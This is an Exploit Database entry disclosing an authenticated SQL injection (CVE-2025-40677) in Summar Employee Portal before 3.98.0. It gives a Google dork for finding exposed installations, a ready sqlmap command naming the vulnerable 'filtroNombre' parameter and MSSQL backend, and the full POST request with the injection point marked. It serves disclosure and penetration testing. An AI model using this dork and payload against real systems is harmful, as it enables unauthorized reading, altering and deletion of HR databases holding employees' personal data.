[webapps] Summar Employee Portal 3.98.0 - Authenticated SQL Injection

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Summar Employee Portal 3.98.0 - Authenticated SQL Injection EDB-ID: 52462 CVE: 2025-40677 EDB Verified: Author: PETER GABALDON Type: WEBAPPS Exploit:   /   Platform: MULTIPLE Date: 2025-12-16 Vulnerable App: # Exploit Title: Summar Employee Portal 3.98.0 - Authenticated SQL Injection # Google Dork: inurl:"/MemberPages/quienesquien.aspx" # Date: 09/22/2025 # Exploit Author: Peter Gabaldon - https://pgj11.com/ # Vendor Homepage: https://www.summar.es/ # Software Link: https://www.summar.es/software-recursos-humanos/ # Version: < 3.98.0 # Tested on: Kali # CVE: CVE-2025-40677 # Description: SQL injection vulnerability in Summar Software´s Portal del Empleado. This vulnerability allows an attacker to retrieve, create, update, and delete the database by sending a POST request using the parameter “ctl00$ContentPlaceHolder1$filtroNombre” in “/MemberPages/quienesquien.aspx”. $ sqlmap --random-agent -r req.sqli.xml -p 'ctl00%24ContentPlaceHolder1%24filtroNombre' --dbms="MSSQL" POST /MemberPages/quienesquien.aspx HTTP/1.1 Host: [REDACTED] Cookie: [REDACTED] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest X-Microsoftajax: Delta=true Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded; charset=utf-8 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: keep-alive ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24ContentPlaceHolder1%24lnkVerTrabajador&ctl00%24ContentPlaceHolder1%24filtroNombre=[SQL_INJECTION_POINT]&ctl00%24ContentPlaceHolder1%24ddlEmpresa=&ctl00%24ContentPlaceHolder1%24filtroCentro=&ctl00%24ContentPlaceHolder1%24filtroUO=&ctl00%24ContentPlaceHolder1%24filtroPuesto=&__EVENTTARGET=ctl00%24ContentPlaceHolder1%24lnkVerTrabajador&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=...&__VIEWSTATEGENERATOR=...&__ASYNCPOST=true& Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services